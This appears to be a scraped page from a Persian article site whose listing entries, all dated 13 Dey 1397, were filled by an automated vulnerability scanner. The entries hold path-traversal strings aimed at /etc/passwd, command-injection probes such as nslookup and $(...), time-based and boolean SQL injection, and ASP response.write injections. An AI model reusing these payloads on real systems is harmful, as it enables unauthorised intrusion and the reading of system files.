./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././. 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd 13 دی 1397

1


1 13 دی 1397

1


../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd 13 دی 1397

1


1 13 دی 1397

1


/.././.././.././.././.././.././.././../etc/./passwd%00 13 دی 1397

1


%2fetc%2fpasswd 13 دی 1397

1


1 13 دی 1397

1


/etc/passwd 13 دی 1397

1


1 13 دی 1397

1


.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 13 دی 1397

1


1 13 دی 1397

1


/../..//../..//../..//../..//../..//etc/passwd.jpg 13 دی 1397

1


1 13 دی 1397

1


..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 13 دی 1397

1


1 13 دی 1397

1


../../../../../../../../../../etc/passwd.jpg 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

&nslookup cs9Pagzx&'\"`0&nslookup cs9Pagzx&`'


..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

$(nslookup XT5wjm5i)


../../../../../../../../../../../../../../../proc/version 13 دی 1397

1


1 13 دی 1397

set|set&set


1 13 دی 1397

1


../../../../../../../../../../etc/passwd 13 دی 1397

1


1 13 دی 1397

1


R7f5kabv'));select pg_sleep(6); -- 13 دی 1397

1


1 13 دی 1397

xruvO3cO


1 13 دی 1397

1


7AZo9YT7');select pg_sleep(3); -- 13 دی 1397

1


-1));select pg_sleep(3); -- 13 دی 1397

1


1 13 دی 1397

1


q48UANa4';select pg_sleep(3); -- 13 دی 1397

1


-1);select pg_sleep(9); -- 13 دی 1397

1


CxrBKOOC 13 دی 1397

1


1 13 دی 1397

1


-1;select pg_sleep(9); -- 13 دی 1397

1


1 13 دی 1397

1


&nslookup 0CgEjDeE&'\"`0&nslookup 0CgEjDeE&`' 13 دی 1397

1


j9vd0AU8'; waitfor delay '0:0:9' -- 13 دی 1397

1


$(nslookup BSCKEeCm) 13 دی 1397

1


set|set&set 13 دی 1397

1


1 waitfor delay '0:0:6' -- 13 دی 1397

1


-1); waitfor delay '0:0:6' -- 13 دی 1397

1


-1; waitfor delay '0:0:3' -- 13 دی 1397

1


(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/ 13 دی 1397

1


if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ 13 دی 1397

1


1 13 دی 1397

"+response.write(9532412*9406247)+"


1 13 دی 1397

'+response.write(9532412*9406247)+'


-1" OR 2+524-524-1=0+0+0+1 -- 13 دی 1397

1


-1' OR 2+794-794-1=0+0+0+1 or 'aajQRWLK'=' 13 دی 1397

1


1 13 دی 1397

response.write(9532412*9406247)


-1' OR 2+254-254-1=0+0+0+1 -- 13 دی 1397

1


1 13 دی 1397

1


-1 OR 2+299-299-1=0+0+0+1 -- 13 دی 1397

1


1 13 دی 1397

1


-1 OR 2+35-35-1=0+0+0+1 13 دی 1397

1


1 13 دی 1397

1


xsuCW1j5 13 دی 1397

1


"+response.write(9988552*9683290)+" 13 دی 1397

1


'+response.write(9988552*9683290)+' 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


response.write(9988552*9683290) 13 دی 1397

1


1 13 دی 1397

1


مقالات ویژه
آرشیو


مقالات پربازدید
آرشیو


آخرین مقالات
آرشیو


بازدید امروز: 1214

بازدید هفته: 6264

بازدید ماه: 34349

کلیه حقوق سایت متعلق به مدیر سایت میباشد.